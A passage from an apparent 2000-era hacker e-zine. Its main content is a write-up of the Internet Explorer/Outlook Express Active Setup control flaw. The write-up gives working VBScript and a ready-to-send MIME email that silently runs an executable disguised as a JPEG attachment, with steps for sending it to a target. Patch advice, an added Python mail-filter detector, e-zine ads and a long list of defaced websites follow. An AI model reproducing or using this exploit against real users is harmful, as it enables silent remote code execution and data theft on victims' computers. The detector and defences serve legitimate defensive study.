     'was not enough. Or maybe you have installed Microsoft's patches :)
     'If a larger delay doesn't help, check if the file "ASDF.JPG" exists
     'in C:\WINDOWS\TEMP and it is a valid CAB file and it contains the
     'ASDF.CIF and ASDF.EXE files. Check if ASDF.CIF has valid and correct
     'information.
     '
     'The thing anyone would do now would be to silently exit the VBScript and
     'keep quiet about it.
     Exit Sub
     End If
     'Oh wow! We have things moving now. There were no problems with the
     'engine initialization.
     'SetAction sets the action for the [ASCB] module to be 1=Install module.
     'SetAction accepts values other than 1 for uninstall, etc.
     Inst.SetAction "ASCB", 1
     'ProcessComponents is used to start the install (our dummy install).
     'This will execute the command described by Command1="asdf.exe" line
     'in ASDF.CIF file.
     '
     'ProcessComponents with an argument of 7 (111 binary) will inhibit
     'the display of all progress and status and information windows during
     'the dummy installation.
     Inst.ProcessComponents 7
     'Well, if you have come so far, your program ASDF.EXE has already run.
     'So there.
     End Sub
     //-->
     </script>
     </BODY>
     </HTML>
     <!-- End of HTML code -->
     
     Now what? Well, I guess it should be simple now. Create an
     email message containing the above HTML. Attach the ASDF.JPG
     file to it. Send it to the target client.
     
     A sample email which you can pipe into /usr/lib/sendmail is
     given as follows. This will work with Outlook Express.
     Use "/usr/lib/sendmail -t < the_following_text.txt".
     
     From: Sender <sender@yourhost.com>
     To: Receipient <receipt@targethost.com>
     Subject: Hi
     MIME-Version: 1.0
     Content-Type: multipart/mixed;
     boundary="----=_NextPart_000_0071_01BF2DD4.558D3F20"
     This is a multi-part message in MIME format.
     ------=_NextPart_000_0071_01BF2DD4.558D3F20
     Content-Type: multipart/alternative;
     boundary="----=_NextPart_001_0072_01BF2DD4.558D3F20"
     ------=_NextPart_001_0072_01BF2DD4.558D3F20
     Content-Type: text/plain;
     charset="us-ascii"
     Here is a great picture for you....!!!
     ------=_NextPart_001_0072_01BF2DD4.558D3F20
     Content-Type: text/html;
     charset="us-ascii"
     <HTML>
     <HEAD>
     <TITLE>Hi</TITLE>
     </HEAD>
     <BODY OnLoad="TryInstall()">
     Here is a great picture for you....!!!
     <object id="Inst"
     classid="CLSID:6E449683-C509-11CF-AAFA-00AA00B6015C">
     </object>
     <script language="VBScript">
     <!--
     Sub TryInstall()
     Inst.BaseUrl = "file:///C:/Windows/Temp"
     Inst.SetCifFile "asdf.jpg", "asdf.cif"
     x = SetTimeout("DoRest",500,"VBScript")
     End Sub
     Sub DoRest()
     If Inst.EngineStatus <> 3 Then
     Exit Sub
     End If
     Inst.SetAction "ASDF", 1
     Inst.ProcessComponents 7
     End Sub
     //-->
     </script>
     </BODY>
     </HTML>
     ------=_NextPart_001_0072_01BF2DD4.558D3F20--
     ------=_NextPart_000_0071_01BF2DD4.558D3F20
     Content-Type: image/jpeg;
     name="asdf.jpg"
     Content-Transfer-Encoding: base64
     Content-Disposition: attachment;
     filename="asdf.jpg"
     TVNDRgAAAACaSAAAAAAAACwAAAAAAAAAAwEBAAIAAADKUQAAXgAAAAIAAxUA0AA
     AAAAAAAAA
     YOUR MIME ENCODED ASDF.JPG FILE (CABINET FILE)
     GOES HERE. use "mimencode" to encode your file.
     JzyP5RPpLP721w5JQuJDq4X9V+Lg9T+5N/TYlKJPQO5OhkNNxv/C5VJSf1mvnD/
     dkpPBfy+X
     seZRxIgSPp8AAA==
     ------=_NextPart_000_0071_01BF2DD4.558D3F20--
     .
     
     Place your MIME base64 encoded ASDF.JPG file in the place shown
     above. Remove the lines with the junk characters (watch the
     spacing). They are retained above as delimiters for your
     reference. You should put your own MIME encoded ASDF.JPG in
     place of it. You can MIME encode your file using the
     "mimencode" program.
     
     Cons and defences
     
     This bug is BIG. Anyone can do anything with your computer if
     you use Outlook Express and have not taken precautionary
     measures. The threat of email viruses, email bombs, etc. cannot
     be ruled out. More importantly, if your computer contains
     classified data, this can easily be transferred out. Proxies
     and firewalls cannot prevent any damage!
     
     What can be done?
     
     1. Download the patches from Microsoft's website for the Active
     Setup control and install them.
     2. Junk Outlook Express. It is too intelligent. Use a simple
     e-mail client such as PINE.
     3. Set your TEMP directory to something else.
     4. Disable all ActiveX component execution (High security
     zone).
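
     A mail-gateway check for the two things this attack depends on, given
     here as an added example (not part of Mukund's document): an attachment
     whose bytes contradict its declared type, such as the "MSCF" cabinet
     signature that the sample's base64 "TVNDRg..." decodes to, and an HTML
     part that instantiates the Active Setup CLSID quoted above. The sample
     messages, addresses and function names are constructed for illustration.

```python
import email
import re
from email import policy
from email.message import EmailMessage

# CLSID of the Active Setup control, as quoted in the document above.
ACTIVE_SETUP_CLSID = "6E449683-C509-11CF-AAFA-00AA00B6015C"
CLSID_RE = re.compile(
    r"classid\s*=\s*[\"']?\s*clsid:\s*\{?" + re.escape(ACTIVE_SETUP_CLSID),
    re.I,
)

# Leading bytes ("magic") of the formats this check distinguishes.
MAGIC = [
    ("cab", b"MSCF"),
    ("jpeg", b"\xff\xd8\xff"),
    ("gif", b"GIF87a"),
    ("gif", b"GIF89a"),
    ("png", b"\x89PNG\r\n\x1a\n"),
    ("exe", b"MZ"),
]
BY_MIME = {"image/jpeg": "jpeg", "image/gif": "gif", "image/png": "png"}
BY_EXT = {".jpg": "jpeg", ".jpeg": "jpeg", ".gif": "gif", ".png": "png"}


def sniff(data):
    """Return the format name implied by the first bytes, or None."""
    for kind, magic in MAGIC:
        if data.startswith(magic):
            return kind
    return None


def declared_kind(part):
    """Format the sender claims, taken from the filename, else the MIME type."""
    name = (part.get_filename() or "").lower()
    for ext, kind in BY_EXT.items():
        if name.endswith(ext):
            return kind
    return BY_MIME.get(part.get_content_type())


def scan_message(raw):
    """Return a list of (rule, part name, detail) findings for one message."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        name = part.get_filename() or part.get_content_type()
        body = part.get_payload(decode=True) or b""  # undoes base64 / QP
        if part.get_content_type() == "text/html":
            # latin-1 never fails to decode; the pattern is pure ASCII.
            if CLSID_RE.search(body.decode("latin-1")):
                findings.append(("active-setup-object", name, ACTIVE_SETUP_CLSID))
            continue
        expected = declared_kind(part)
        if expected is None:
            continue  # no claim we know how to verify
        actual = sniff(body)
        if actual != expected:
            detail = "declared %s, content is %s" % (expected, actual or "unknown")
            findings.append(("type-mismatch", name, detail))
    return findings


def build_sample(attachment, html):
    """Constructed message: text + HTML body and one image/jpeg attachment."""
    msg = EmailMessage()
    msg["From"] = "sender@example.com"
    msg["To"] = "rcpt@example.com"
    msg["Subject"] = "Hi"
    msg.set_content("Here is a picture.")
    msg.add_alternative(html, subtype="html")
    msg.add_attachment(attachment, maintype="image", subtype="jpeg",
                       filename="asdf.jpg")
    return msg.as_bytes()


# Constructed inputs: the "cabinet" is only the 4-byte signature plus padding.
SUSPECT = build_sample(
    b"MSCF" + bytes(32),
    '<html><body><object id="Inst" classid="CLSID:%s"></object></body></html>'
    % ACTIVE_SETUP_CLSID,
)
CLEAN = build_sample(b"\xff\xd8\xff\xe0" + bytes(32), "<html><body>Hi</body></html>")

if __name__ == "__main__":
    for label, raw in (("suspect", SUSPECT), ("clean", CLEAN)):
        print(label, scan_message(raw))
```

     Either finding alone is grounds to quarantine the message: the control
     ignores the file extension, so the filter has to look at the bytes.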
     
     Links
     
     http://www.securityfocus.com/bid/775/ - Active Setup control
     vulnerability details on securityfocus.com.
     http://msdn.microsoft.com/library/periodic/period98/vbpj0798.htm
     - Documentation on the Active Setup control.
     http://www.microsoft.com/technet/security/bulletin/fq99-048.asp
     - Microsoft's security bulletin for the vulnerability.
     http://www.microsoft.com/msdownload/iebuild/ascontrol/en/ascontrol.htm
     - Microsoft's update for the control.
     http://pages.whowhere.com/computers/cuartangojc/ - Juan Carlos
     Garcia Cuartango's pages.
     http://www.securityfocus.com/ - Security news, BUGTRAQ,
     security related utilities, etc.
     
     Author
     
     I'm a student of M.Sc. Computer Science. I do security
     analysis, Linux network security, web development, 3D-game
     programming, demos, network programming, data compression, etc.
     I know C, x86 asm. My primary development platform has been
     Linux for the past 5 years. I love music.
     
     I trust opensource systems.
     
     This bug scares me and sometimes makes me laugh too. After
     working on numerous vulnerabilities which needed setting up
     byte sequences to exploit buffer overflows, and other stuff,
     this vulnerability comes along. And it says, roll your own EXE
     file, transfer and execute it on any machine. Beats everything
     I have seen so far.
     
     Please educate people about this bug. This bug is more severe
     than it seems. Spread the word asking people to download the
     patches off Microsoft's site and install them.
     
     PS: Although I would love to hear from you, please DO NOT bomb
     me with mail ;) Please keep your discussions on this topic on
     BUGTRAQ as much as you can. You can get all the information you
     need in this document and by following the links given above.
     If you have any problems with the content on this page and want
     me to take some of it off, please contact me.
     
     Cheers!
     Mukund <muks@crosswinds.net>
     
     @HWA
     
                    
             
      
                        

     
AD.S  ADVERTI$ING.       The HWA black market                  ADVERTISEMENT$.
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
                              _                _   _     _
                     /\      | |              | | (_)   (_)
                    /  \   __| |_   _____ _ __| |_ _ ___ _ _ __   __ _
                   / /\ \ / _` \ \ / / _ \ '__| __| / __| | '_ \ / _` |
                  / ____ \ (_| |\ V /  __/ |  | |_| \__ \ | | | | (_| |
                 /_/    \_\__,_| \_/ \___|_|   \__|_|___/_|_| |_|\__, |
                                                                  __/ |
                                                                 |___/
                                                                 
                                                                 
       ADVERTISING IS FREE, SEND IN YOUR ADS TO CRUCIPHUX@DOK.ORG
       
       
       

        ______________________________________________________________
        
        French Hackers' Portal / Le Portail Des Lascars Francophones
        Links and News of interest / Liens et news pour lascars.  ;-)
        
        --------------------------------------------------------------
        ->->->->->->->->->  http://lascars.cjb.net  <-<-<-<-<-<-<-<-<-
        ______________________________________________________________

  


       
       
                      http://revenger.hypermart.net
                      
                                          
                                                          
                                                        
                                                
                                                        
                                                             
    
              T E X T Z             F I L E                 HOMEPAGE
                        http://revenger.hypermart.net
    
                   Here you may find up to 340 text files for:
         ANARCHY , HACKING , GUIDES , CRACKING , VIRUS , GENERAL , ELECTRONICS ,
         UNIX , MAGAZINES , TOP SECRET , CARDING , U.F.O.s , LOCKPICKING , IRC ,
         PHREAKING , BOOKS AND A-S FILES AVAILABLE!
    
                        http://revenger.hypermart.net
    
                                Visit Us Now !
           
       
         
       
                                               .
                                                        .
               ...............          .
               :             :     .  . . .  .          .
             __:________     :          :   ___________ . .   .
             \       < /_____:___       :  (      < __( :_______
              )                : )______:___\_     (___(     : /
        =====/________|_________/ < |      : (________________(======
               :           (__________________)         :wd!
               .             :          :               :
           - / -  w w w . h a c k u n l i m i t e d . c o m  - / -
               :        .  . . .  .     :               :
          .  . . .  .                   :...............:
                             .
               .


      
      
    **************************************************************************
    *                                                                        *
    *        ATTRITION.ORG     http://www.attrition.org                      *
    *        ATTRITION.ORG     Advisory Archive, Hacked Page Mirror          *
    *        ATTRITION.ORG     DoS Database, Crypto Archive                  *
    *        ATTRITION.ORG     Sarcasm, Rudeness, and More.                  * 
    *                                                                        *
    **************************************************************************      
              
 
    +------------------------------------------------------------------------+
    | SmoG Alert ..          http://smog.cjb.net/        NEWS on SCIENCE     |
    | ===================    http://smog.cjb.net/        NEWS on SECURITY    |
    | NEWS/NEWS/NEWS/NEWS    http://smog.cjb.net/        NEWS on THE NET     |
    |                        http://smog.cjb.net/        NEWS on TECHNOLOGY  |
    +------------------------------------------------------------------------+
       
    * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * **
    *       www.csoft.net webhosting, shell, unlimited hits bandwidth ...    *
    *         www.csoft.net www.csoft.net www.csoft.net www.csoft.net        *
    *                                                                        *
    *                    http://www.csoft.net/                               *
    *                                                                        *
    *             One of our sponsors, visit them now                        *
    *                                                                        * 
    * * * * * * ** * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
       
       
       

    * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
    * 2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM *
    * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *


        

     @HWA
     
       
              
             
HA.HA Humour and puzzles ...etc
      ~~~~~~~~~~~~~~~~~~~~~~~~~
                                                 Don't worry. worry a *lot*
                                                 
      Not much this week, but this is worth a peek .. heh tnx multisync for
      the url... - Ed

      http://www.hardocp.com/news_images/2000/february_2000/bsod.jpg                                                 
      
       
      
                  
      @HWA
      
      
      =-----------------------------------------------------------------------=
      
      
                                   _ _
                               ___(_) |_ ___ ___
                              / __| | __/ _ Y __|
                              \__ \ | ||  __|__ \
                              |___/_|\__\___|___/       
       
       
     SITE.1  
     
     -=- Coding/Software -=-
     
     http://www.dragonmount.net/dirc 
     
     erikR
     
     
     Not security or hack related, well hack as in a code hack maybe..this is
     a new windows32 based irc client which I think could very well usurp mIRC
     from its position at #1 for windows. Check it out, the development team
     is willing to listen to suggestions etc, how often do you get a chance to
     get your ideas acted on in a new product? ... - Ed
     
     
     -=- Hacking/Security -=-
          
     http://hackdesk.dhs.org/
     
     iPulse
     
     A new site under major development (but still looking good and working
     well in this limited fashion) well worth a visit, we'll be hearing and
     seeing more from HackDesk Labs in the future, I'm sure of it, check it
     out. - Ed
     
     
     -=- Security -=-
     
     
     http://www.pure-security.net/
     
     This site has come a long way since its inception in fact its founder
     commonly known as MostHated has come a long way too. The site is very
     informative, well laid out and professional. Check it out today, and
     remember the people behind the site know their shit.
     
     
     Blurb from the site; (Verbatim)
     
     
     Services 

     Here we are dedicated to security on whatever it is you want secured, let it
     be your personal computer, a workstation at your job, your private network
     or even a corporations network, it doesn't matter as long as they are secure,
     which is something we emphasize here at PSN. Some people list services
     in which they want to brag about, because maybe they are specialized in
     certain area and may charge a flat rate. Well, here we don't, we charge
     depending on network structure and work being actually done and i
     guarantee we don't charge probably anywhere close to as high as other
     firms. We here would rather have your security strong then our pockets
     filled, because our work makes a difference and that is more important then
     having a lot of money. Simple contact us with what it is you need done and
     we will begin to start negotiating a contract type work or whatever it is you
     want done, because you can even hire one of us to be your security
     administrator and be dedicated to your network and it's security under your
     wing. However you want it done, we are here to supply the services and
     hope to suit your satisfaction with our work. Always remember that your
     security now could save you a lot of money in the future against malicious
     type people or just someone who enters your network and makes a
     mistake. It is a must and we please ask if you don't want our services for
     your security of your site, then please search somewhere for another firm or
     do it yourself, as long as your security is one of the top concerns on your
     network. We hope to be hearing from you and as time goes, we'll give
     dedicated services or service packages for our clients, but for now, it is
     whatever you would like done. 

     To contact on getting security help through PSN or just to gain information
     about how we work, then please contact us here.(most@pure-security.net)
     
     
     
     -=- Security -=-
     
     
     
     http://www.csanetworks.com/
     
     The premier site of systemV (Edward Elliot) also an ex gH (Global Hell)
     member, is looking good, another professional looking site, check her
     out and scope out the goods from people that can deliver.
     
     Blurb from the site: (Verbatim)    
     
     Why Choose CSANetworks.com? 
     
     At CSA Networks we have what it takes to get your
     business or network secure and ready for the day to
     day hazards of online. From large corporate networks,
     that have company critical information, to small home
     networks that are host to the latest quake server,
     you must be sure you are ready. We here at CSA
     Networks can provide you the services needed to
     keep your networks secure. From remote access, to
     snooping co-workers and the like. We offer one of the
     most Comprehensive Security Assessments, Risk
     Analysis, and Client-System Tests in the market, and
     at a fraction of the price of other competitors.
     
     
     -=-
     
           
            
            
      You can send in submissions for this section too if you've found 
      (or RUN) a cool site...
       
        
       
      @HWA
       
         
         
  H.W Hacked websites 
     ~~~~~~~~~~~~~~~~
    
                    ___|                  _ \               |
                   |      __| _` |\ \  / |   |  __| _ \  _` |
                   |     |   (   | `  <  |   | |    __/ (   |
                  \____|_|  \__,_| _/\_\\___/ _|  \___|\__,_|


      Note: The hacked site reports stay, especially with some cool hits by
            groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed

          * Hackers Against Racist Propaganda (See issue #7)

     
      Haven't heard from Catharsys in a while for those following their saga visit
      http://frey.rapidnet.com/~ptah/ for 'the story so far'...
      
      Hacker groups breakdown is available at Attrition.org
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      check out http://www.attrition.org/mirror/attrition/groups.html to see who
      you are up against. You can often gather intel from IRC as many of these
      groups maintain a presence by having a channel with their group name as 
      the channel name, others aren't so obvious but do exist.
      
      >Hacked Sites Start<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
      
      ========================================================================== 
      
      
      * Info supplied by the attrition.org mailing list.
      
      Cracked webpage archives (list from attrition)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://www.attrition.org/
      http://www.hackernews.com/archive/crackarch.html
      http://www.freespeech.org/resistance/
      http://www.rewted.org/cracked/
      http://www.403-security.org/
      http://www.projectgamma.com/defaced/
      http://www.net-security.org/
      http://www.netrus.net/users/beard/pages/hacks/
      http://212.205.141.128/grhack/html/default_hacking.html
      http://194.226.45.195/hacked/hacked.html
      http://alldas.de/crkidx1.htm
      http://www.turkeynews.net/Hacked
      http://www.flashback.se/hack/
      http://www.dutchthreat.org/
      http://www.onething.com/archive/
      http://www.2600.com/hacked_pages/
      http://hysteria.sk/hacked/
      http://erazor.vrnet.gr/
      
      
      
      
      Cracked sites listed oldest to most recent...does anyone read these?
      
      
       Date      OS Group/Person      AMCK Site                            2000
       ~~~~      ~~ ~~~~~~~~~~~~      ~~~~ ~~~~                          ~~~~~~~~
      
      [00.02.29] NT [ ]                M   Itri Rodoferrovia e Servicos Ltda (itri.com.br)
      [00.02.29] NT [zillion]              CompuAll Inc (www2.compuall.net)
      [00.02.29] NT [Opiat3]               Security Bank (www.sec-bank.com)
      [00.02.29] NT [Crime Boys]           Lojas Arno Palavro Ltda (www.lojasarno.com.br)
      [00.02.29] NT [Crime Boys]           Data Brasil (www.databrasil.com.br)
      [00.02.29] NT [ ]                    Valhalla Union Free School District (valhalla.k12.ny.us)
      [00.02.29] NT [Tr1pl3 S31S]       C  SABA (saba.co.za)
      [00.02.28] NT [ ]                M   Sebrae - Servico De Apoio as Micro E Pequenas (www.sebrae-sc.com.br)
      [00.02.28] Li [g04tz s3kur1ty]       Sinnerz (www.sinnerz.com)
      [00.02.28] NT [ ]                 C  Net Service Assessoria e Informatica (www.rjnet.com.br)
      [00.02.28] Ir [IZ corp]              vof Heksenkethel (www.heksenkethel.nl)
      [00.02.28] NT [Cyber Fuckers]        The Georgia, Ukraine, Uzbekistan, Azerbaijan and Moldova Group (www.guuam.org)
      [00.02.28] BI [Cyber Fuckers]        Embassy of Finland in Ottawa, Canada (www.finemb.com)
      [00.02.28] NT [Cyber Fuckers]        Embassy of Azerbaijan in the USA (www.azembassy.com)
      [00.02.28] Ir [IZ corp]              Animece (www.animece.com.ve)
      [00.02.27] NT [IZ corp]              Working Consultoria e Assessoria em Comunicacao Ltda (www.workingnet.com.br)
      [00.02.27] Lr [sCr33n DuMp]          Zero Tolerance (www.zero-tolerence.com)
      [00.02.27] So [Starman_Jones]        Weston High School (www.westonhighschool.com)
      [00.02.27] NT [W.H.I.T.E]            Thames Valley District School Board (www.tvdsb.on.ca)
      [00.02.27] NT [grn]                  REB (www.reb.com)
      [00.02.27] NT [W.H.I.T.E]            Education - Management Board Secretariat (www.ocdsb.edu.on.ca)
      [00.02.27] Li [DHC]                  Miss Universe, Trinidad and Tobago (www.missuniverse.co.tt)
      [00.02.27] NT [Bash]                 Michigan Section for the American Water Works Association (www.mi-water.org)
      [00.02.27] NT [KabraLzZ]             MexiCom (www.mexicom.com.mx)
      [00.02.27] NT [VUGO and DD]      M   HydroPower (www.hydropower.com.br)
      [00.02.27] NT [W.H.I.T.E]            Gonzaga High School, Newfoundland (www.gonzaga.k12.nf.ca)
      [00.02.27] NT [Arsenationa]          Elizabeth City MotoCross Club (www.ecmx.com)
      [00.02.27] NT [n0p]                  Chestnut Health Systems (www.chestnut.org)
      [00.02.27] Ir [IZ corp]              Boehme Brasil Consultoria Empresarial Ltda. (www.boehme.com.br)
      [00.02.27] Li [ncode and dumone]     Asia Travels (www.asia-travels.com)
      [00.02.27] NT [H and X-Girl]         Alphaville Veículos Ltda (www.alphavel.com.br)
      [00.02.27] NT [KabraLzZ]             Associacao Brasileira da Industria (www.abimaq.org.br)
      [00.02.27] NT [protokol]         M   ABC Unified School District (www.abcusd.k12.ca.us)
      [00.02.27] Lr [GForce Pakistan]      University of Wales, Swansea (pyjamas.swan.ac.uk)
      [00.02.27] NT [t.g.s.u]              Jiangsu Economic Information Network (jsfamous.js.cei.gov.cn)
      [00.02.27] NT [Amatus]               Fuzzy Gamer (fuzzygamer.powersurfr.com)
      [00.02.26] So [kryptek]           C  Autonomous System of System Architecture Laboratory CE96 Server (ce96.kaist.ac.kr)
      [00.02.26] NT [Death Knights]        Well Computer (www.wellcomputer.com.br)
      [00.02.26] NT [VUGO and DD]          Vivo Desejo Decoracao de Festas Ltda (www.vivodesejo.com.br)
      [00.02.26] NT [VUGO and DD]          Transboy Entregas Rápidas Ltda. (www.transboy.com.br)
      [00.02.26] Lr [sCr33n DuMp]          Seriously Cool (www.seriouslycool.com)
      [00.02.26] Lr [AnTil00p]             Presente (www.presente.com.mx)
      [00.02.26] NT [skeme]                County Kildare Community Network (www.kildare.ie)
      [00.02.26] Li [Mr_OZZY]              IKRO (www.ikro.com.br)
      [00.02.26] NT [Team eScape]          Half Life S.A. (www.half-life.co.za)
      [00.02.26] Lr [ ]                    H2SO4 (www.h2so4.org)
      [00.02.26] NT [Tr1pl3 S31S]          Groen Hoek S.A. (www.groenhoek.co.za)
      [00.02.26] Bf [MindVox]              Freakers (www.freakers.org)
      [00.02.26] NT [zb]                   Ensoniq Corporation (www.ensoniq.com)
      [00.02.26] Lr [sCr33n DuMp]          Elite Hackers (www.elitehackers.net)
      [00.02.26] NT [Bash]                 Computing Edge (www.computingedge.com)
      [00.02.26] NT [Cyber Fuckers]     C  Comisión Federal de Competencia (www.cfc.gob.mx)
      [00.02.26] NT [Death Knights]     C  Botafogo De Futebol e Regatas (www.botafogo.com.br)
      [00.02.26] Li [|3|aqU3 WrM]         CapSync Systems Inc. (www.bbmcc.com)
      [00.02.26] Lr [sCr33n DuMp]          A Perfect World (www.aperfectworld.com)
      [00.02.26] Lr [heataz]               AnnuPro (www.annupro.fr)
      [00.02.26] NT [Team eScape]          2nd Hand Games S.A. (www.2ndhandgames.co.za)
      [00.02.26] So [kryptek]           C  Autonomous System of System Architecture Laboratory Former4 Server (former4.kaist.ac.kr)
      [00.02.26] So [kryptek]              CC Club of the Autonomous System of System Architecture Laboratory (ccclub.kaist.ac.kr)
      [00.02.25] NT [Crime Boys]           Xerox Italia (www.xerox.it)
      [00.02.25] NT [Xhostrile]            Vermont National Bank (www.vermontnationalbank.com)
      [00.02.25] NT [fragile]              Cytron Technologies Ltd. (www.tnyw.com)
      [00.02.25] NT [sk|tz0-NET]           Phant0mNet (www.phant0m-net.com)
      [00.02.25] Li [ ]                    Net Nuri (www.netnuri.com)
      [00.02.25] NT [c0rvus]               Memphis Library (www.memphislibrary.lib.tn.us)
      [00.02.25] NT [VUGO and DD]          PH Promoções & Produções Artisticas S/C Ltda (www.marceloaguiar.com.br)
      [00.02.25] So [GForce Pakistan]      Levi's Music (www.levismusic.com)
      [00.02.25] NT [Cyber Fuckers]        Associacao Alumni/Alumnae do JMC (www.jmc.org.br)
      [00.02.25] NT [VUGO]                 Condomínio Edificio Royal Dansk (www.haddadseguros.com.br)
      [00.02.25] NT [rat]                  DoSolutions (www.dosolutions.com)
      [00.02.25] NT [ ]                    Devils Clan (www.devi1.com)
      [00.02.25] NT [Team Infinity]        Converse College (www.converse.edu)
      [00.02.25] BI [Quant4m]              Buns Bunny (www.bunsbunny.com)
      [00.02.25] NT [Erica]                BFNCOL S.A. (www.bfncol.co.za)
      [00.02.25] NT [Death Knights]        Information System and Tecnology Innovation (www.abramo.it)
      [00.02.25] NT [Team Infinity]        Yamaha Motor Europe (www.yme.com)
      [00.02.25] NT [KabraLzZ]             VISAR Informatica Ltda. (www.visar.com.br)
      [00.02.25] NT [Team Infinity]        Southwestern University School of Law (www.swlaw.edu)
      [00.02.25] NT [VUGO and DD]          Nike Taiwan (www.nike.com.tw)
      [00.02.25] NT [Mr Ozzy]              Cursos e Serviços em Informática Ltda. (www.newworldmd.com.br)
      [00.02.25] NT [bash]                 Lima Public Library (www.lima.lib.oh.us)
      [00.02.25] NT [Tr1pl3 S31S]          Kloppers S.A. (www.kloppers.co.za)
      [00.02.25] NT [Death Knights]     C  Bricks and Clay Roof Tiles Industry Manufacturer (www.ilr.it)
      [00.02.25] NT [Team Echo]            City Realty (www.citirealty.com)
      [00.02.25] NT [KabraLzZ]             Boca Deurna (www.bocadeurna.com.br)
      [00.02.25] NT [VUGO and DD]          96 Automation Co. (www.96auto.com.tw)
      [00.02.25] NT [Aero]                 Trinity Solutions (trinitysolutions.com)
      [00.02.24] NT [Mickey Mouse]         Theatre UK (www.theatreuk.co.uk)
      [00.02.24] Li [Death Knights]    M   Outcome (www.outcome.it)
      [00.02.24] NT [#Swehack]             House of Sin (www.houseofsin.com)
      [00.02.24] Li [ ]                 C  Gestione immobili ad uso alberghiero (www.amorosa.it)
      [00.02.23] NT [DS]                   Racom Corporation (www.racom.net)
      [00.02.23] NT [idiot]            M   Daeil Computer Company (www.p3k.com)
      [00.02.23] NT [Paragon]              Interactive Property Network (www.interactiveproperty.net)
      [00.02.23] NT [fl0w]                 If Virtual (www.ifvirtual.com)
      [00.02.23] So [GForce Pakistan]      Branden University (www.branden.edu)
      [00.02.23] So [Team Echo]            The Phone Store (www.phonestore.com)
      [00.02.23] Bf [L|mp & ProSys]        Mendonza (www.mendonza.org)
      [00.02.23] Lr [A0 & Bsd3M0n]     M   ICM Sport (www.icm-sport.com)
      [00.02.23] NT [ ]                    Happy Harry's Inc. (www.happy.com)
      [00.02.23] NT [ ]                    Alclagraf Paineis e Com (www.alclagraf.com.br)
      [00.02.23] NT [ ]                    TicketPort Name Server (ns.ticketport.co.jp)
      [00.02.22] NT [Cyber Fuckers]        United Nations Educational, Scientific and Cultural Organization in Brazil (www.unesco.org.br)
      [00.02.22] Li [ZeR0LogiKz]           Internet USA Corp. (www.unclesam.net)
      [00.02.22] NT [TheP|nkPanthe|2]      TicketPort (www.ticketport.co.jp)
      [00.02.22] NT [Team Infinity]        Enter Software, Inc. (www.enter.com)
      [00.02.21] NT [ ]                    Boston Public Schools (www.boston.k12.ma.us)
      [00.02.21] NT [Team Echo]            Burkina Faso Ministre de l'Economie et des Finances (www.finances.gov.bf)
      [00.02.21] NT [Pentaguard]           Kuwait Investment Authority (www.kia.gov.kw)
      [00.02.21] NT [ ]                    Legion Internet (www.legion.net)
      [00.02.21] NT [TheP|nkPanthe|2]      Irish Property Brokers and Home Seekers (www.theirishconnection.com)
      [00.02.21] NT [r00t0ff]              GameStead (www.gamestead.com)
      [00.02.21] Bf [Sabu]                 NDV Private School (ndv.pvt.k12.ca.us)
      [00.02.20] NT [ ]                    Globosat Programadora Ltda (www.telecine.com.br)
      [00.02.20] NT [BlazinWeed]           US Army National Guard Bureau Distributive Training Technology Program (dtt.ngb.army.mil)
      [00.02.20] NT [ ]                    Globosat Programadora Ltda (www.telecine.com.br)
      [00.02.20] NT [TheP|nkPanthe|2]      Techno Wolf (www.technowolf.com)
      [00.02.20] Li [Dark 00]              The Stile Project (www.stileproject.com)
      [00.02.20] BI [sysko]                Soft-X (www.soft-x.com)
      [00.02.20] NT [Team Escape]          Rayco Car Electronics (www.raycocar.com)
      [00.02.20] NT [ ]                    ConaTel Honduras (www.conatel.hn)
      [00.02.20] NT [Team Infinity]        My Track (www.mytrack.com)
      [00.02.20] Li [m0s]                  India Links (www.indialinks.co.in)
      [00.02.20] NT [Tr1pl3 S31S]          I-Kon S.A. (www.i-kon.co.za)
      [00.02.20] NT [Team Escape]          BPB Plc. (www.bpb.com)
      [00.02.20] Li [Argon]                Korea Astronomy Observatory (space21.issa.re.kr)
      [00.02.20] Li [COTDS]                Leisure World Korea (leisureworld.co.kr)
      [00.02.19] NT [Argon]                NOAA Nauticus site (www.nauticus.noaa.gov)
      [00.02.19] NT [ ]                    National Ocean Service Map Finder (mapfinder.nos.noaa.gov)
      [00.02.19] NT [confusion]            Office of the Speaker of the House (www.speaker.gov)
      [00.02.19] NT [Cheitan]              Belgian Federal Planning Bureau (www.plan.be)
      [00.02.19] NT [Delta Team]           USD 261 Haysville Schools (www.usd261.com)
      [00.02.19] Li [M3L40]                Siroflex Argentina (www.siroflex.com.ar)
      [00.02.19] NT [M3L40]                Renato Pereira Lima Me (www.ruas.com.br)
      [00.02.19] Li [m0s]                  Kitchen Grace (www.kitchengrace.com)
      [00.02.19] So [Paco-Tate]            Daily Bread Magazine (www.dbmag.com)
      [00.02.19] NT [FiFG]                 Carbocloro S.A. Industrias Quimicas (www.carbocloro.com.br)
      [00.02.19] NT [Crime Boys]           Burp Contest (www.burpcontest.com)
      [00.02.19] NT [KabraLzZ]         M   América Air (www.americaair.com.br)
      [00.02.19] Li [Argon]             C  Wooree Lighting Co. (wooree.co.kr)
      [00.02.19] Li [COTDS]             C  Inje University Web Info (webinfo.inje.ac.kr)
      [00.02.19] Li [COTDS]             C  Dong-Eui University NC Lab (nclab.dongeui.ac.kr)
      [00.02.19] Li [Argon]                Inje University Math Lab (mathlab.inje.ac.kr)
      [00.02.18] Lr [h2so4 and spl1f]      San Diego Supercomputer Center WORM Server (worm.sdsc.edu)
      [00.02.18] NT [BlackKode]            Editora Evolutivo de Material Didatico (www.yupee.com.br)
      [00.02.18] Li [ ]                    WarNet (www.war-net.com)
      [00.02.18] NT [Team Echo]            Park Cities Dental (www.parkcitiesdental.com)
